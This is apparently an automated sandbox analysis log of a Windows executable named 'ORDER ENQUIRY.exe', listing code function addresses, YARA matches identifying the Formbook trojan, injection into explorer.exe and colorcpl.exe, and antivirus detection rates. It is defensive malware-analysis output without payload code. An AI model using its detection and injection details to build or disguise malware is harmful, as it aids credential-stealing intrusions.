          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC3D403_2_01AC3D40
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B71D5A3_2_01B71D5A
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7FCF23_2_01B7FCF2
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B39C323_2_01B39C32
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7FFB13_2_01B7FFB1
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC1F923_2_01AC1F92
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7FF093_2_01B7FF09
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC9EB03_2_01AC9EB0
          Source: C:\Windows\explorer.exeCode function: 4_2_106972324_2_10697232
          Source: C:\Windows\explorer.exeCode function: 4_2_106960364_2_10696036
          Source: C:\Windows\explorer.exeCode function: 4_2_1068D0824_2_1068D082
          Source: C:\Windows\explorer.exeCode function: 4_2_10691B304_2_10691B30
          Source: C:\Windows\explorer.exeCode function: 4_2_10691B324_2_10691B32
          Source: C:\Windows\explorer.exeCode function: 4_2_1068ED024_2_1068ED02
          Source: C:\Windows\explorer.exeCode function: 4_2_106949124_2_10694912
          Source: C:\Windows\explorer.exeCode function: 4_2_1069A5CD4_2_1069A5CD
          Source: C:\Windows\explorer.exeCode function: 4_2_10D2B0824_2_10D2B082
          Source: C:\Windows\explorer.exeCode function: 4_2_10D340364_2_10D34036
          Source: C:\Windows\explorer.exeCode function: 4_2_10D385CD4_2_10D385CD
          Source: C:\Windows\explorer.exeCode function: 4_2_10D329124_2_10D32912
          Source: C:\Windows\explorer.exeCode function: 4_2_10D2CD024_2_10D2CD02
          Source: C:\Windows\explorer.exeCode function: 4_2_10D352324_2_10D35232
          Source: C:\Windows\explorer.exeCode function: 4_2_10D2FB324_2_10D2FB32
          Source: C:\Windows\explorer.exeCode function: 4_2_10D2FB304_2_10D2FB30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0494E4F65_2_0494E4F6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_049444205_2_04944420
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_049524465_2_04952446
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_049605915_2_04960591
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048A05355_2_048A0535
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048BC6E05_2_048BC6E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0489C7C05_2_0489C7C0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048C47505_2_048C4750
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048A07705_2_048A0770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_049320005_2_04932000
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_049601AA5_2_049601AA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_049581CC5_2_049581CC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048901005_2_04890100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0493A1185_2_0493A118
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_049281585_2_04928158
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_049202C05_2_049202C0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_049402745_2_04940274
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_049603E65_2_049603E6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048AE3F05_2_048AE3F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0495A3525_2_0495A352
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04940CB55_2_04940CB5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04890CF25_2_04890CF2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048A0C005_2_048A0C00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048B8DBF5_2_048B8DBF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0489ADE05_2_0489ADE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048AAD005_2_048AAD00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0493CD1F5_2_0493CD1F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0495CE935_2_0495CE93
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048B2E905_2_048B2E90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0495EEDB5_2_0495EEDB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0495EE265_2_0495EE26
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048A0E595_2_048A0E59
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0491EFA05_2_0491EFA0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04892FC85_2_04892FC8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048ACFE05_2_048ACFE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04942F305_2_04942F30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048E2F285_2_048E2F28
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048C0F305_2_048C0F30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04914F405_2_04914F40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048868B85_2_048868B8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048CE8F05_2_048CE8F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048A28405_2_048A2840
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048AA8405_2_048AA840
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048A29A05_2_048A29A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0496A9A65_2_0496A9A6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048B69625_2_048B6962
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0489EA805_2_0489EA80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04956BD75_2_04956BD7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0495AB405_2_0495AB40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0495F43F5_2_0495F43F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048914605_2_04891460
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0493D5B05_2_0493D5B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_049575715_2_04957571
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_049516CC5_2_049516CC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0495F7B05_2_0495F7B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048A70C05_2_048A70C0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0494F0CC5_2_0494F0CC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0495F0E05_2_0495F0E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_049570E95_2_049570E9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048AB1B05_2_048AB1B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D516C5_2_048D516C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0488F1725_2_0488F172
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0496B16B5_2_0496B16B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048A52A05_2_048A52A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048BB2C05_2_048BB2C0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_049412ED5_2_049412ED
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048E739A5_2_048E739A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0495132D5_2_0495132D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0488D34C5_2_0488D34C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0495FCF25_2_0495FCF2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04919C325_2_04919C32
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048BFDC05_2_048BFDC0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048A3D405_2_048A3D40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04951D5A5_2_04951D5A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04957D735_2_04957D73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048A9EB05_2_048A9EB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048A1F925_2_048A1F92
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0495FFB15_2_0495FFB1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0495FF095_2_0495FF09
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048A38E05_2_048A38E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0490D8005_2_0490D800
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_049359105_2_04935910
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048A99505_2_048A9950
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048BB9505_2_048BB950
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048E5AA05_2_048E5AA0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04941AA35_2_04941AA3
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0493DAAC5_2_0493DAAC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0494DAC65_2_0494DAC6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04957A465_2_04957A46
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0495FA495_2_0495FA49
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04913A6C5_2_04913A6C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048BFB805_2_048BFB80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04915BF05_2_04915BF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048DDBF95_2_048DDBF9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0495FB765_2_0495FB76
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0288E2845_2_0288E284
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0288D6DB5_2_0288D6DB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0288E72C5_2_0288E72C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0288E4C25_2_0288E4C2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0288DBB25_2_0288DBB2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_02879E4B5_2_02879E4B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_02879E505_2_02879E50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_02872FB05_2_02872FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_02872D8C5_2_02872D8C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_02872D905_2_02872D90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0476A0365_2_0476A036
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04762D025_2_04762D02
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0476E5CD5_2_0476E5CD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_047610825_2_04761082
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_047689125_2_04768912
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0476B2325_2_0476B232
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04765B325_2_04765B32
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04765B305_2_04765B30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0490EA12 appears 86 times
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 048D5130 appears 58 times
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0491F290 appears 105 times
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0488B970 appears 280 times
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 048E7E54 appears 102 times
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: String function: 01AAB970 appears 280 times
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: String function: 01B3F290 appears 105 times
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: String function: 01B07E54 appears 111 times
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: String function: 01B2EA12 appears 86 times
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: String function: 01AF5130 appears 58 times
          Source: ORDER ENQUIRY.exe, 00000000.00000002.2096801847.000000000136E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ORDER ENQUIRY.exe
          Source: ORDER ENQUIRY.exe, 00000000.00000002.2100405437.000000000BA10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs ORDER ENQUIRY.exe
          Source: ORDER ENQUIRY.exe, 00000000.00000000.2086523619.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegTwj.exe4 vs ORDER ENQUIRY.exe
          Source: ORDER ENQUIRY.exe, 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs ORDER ENQUIRY.exe
          Source: ORDER ENQUIRY.exe, 00000003.00000002.2158318122.0000000001983000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs ORDER ENQUIRY.exe
          Source: ORDER ENQUIRY.exe, 00000003.00000002.2157829388.0000000001628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs ORDER ENQUIRY.exe
          Source: ORDER ENQUIRY.exe, 00000003.00000002.2158429548.0000000001BAD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ORDER ENQUIRY.exe
          Source: ORDER ENQUIRY.exe, 00000003.00000002.2157829388.000000000164D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs ORDER ENQUIRY.exe
          Source: ORDER ENQUIRY.exeBinary or memory string: OriginalFilenamegTwj.exe4 vs ORDER ENQUIRY.exe
          Source: ORDER ENQUIRY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4564943648.00000000106AF000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: ORDER ENQUIRY.exe PID: 3032, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: ORDER ENQUIRY.exe PID: 4564, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: colorcpl.exe PID: 3944, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: ORDER ENQUIRY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, oHjiQZkJuabU3f09BG.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, oHjiQZkJuabU3f09BG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, oHjiQZkJuabU3f09BG.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, oHjiQZkJuabU3f09BG.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, oHjiQZkJuabU3f09BG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, oHjiQZkJuabU3f09BG.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.ORDER ENQUIRY.exe.4c3bda0.2.raw.unpack, uyO80QM5DlYBNnlsDa.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.ORDER ENQUIRY.exe.ba10000.4.raw.unpack, uyO80QM5DlYBNnlsDa.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@11/6
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER ENQUIRY.exe.logJump to behavior
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_03
          Source: ORDER ENQUIRY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: ORDER ENQUIRY.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: ORDER ENQUIRY.exeVirustotal: Detection: 50%
          Source: ORDER ENQUIRY.exeReversingLabs: Detection: 57%
          Source: unknownProcess created: C:\Users\user\Desktop\ORDER ENQUIRY.exe "C:\Users\user\Desktop\ORDER ENQUIRY.exe"
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeProcess created: C:\Users\user\Desktop\ORDER ENQUIRY.exe "C:\Users\user\Desktop\ORDER ENQUIRY.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
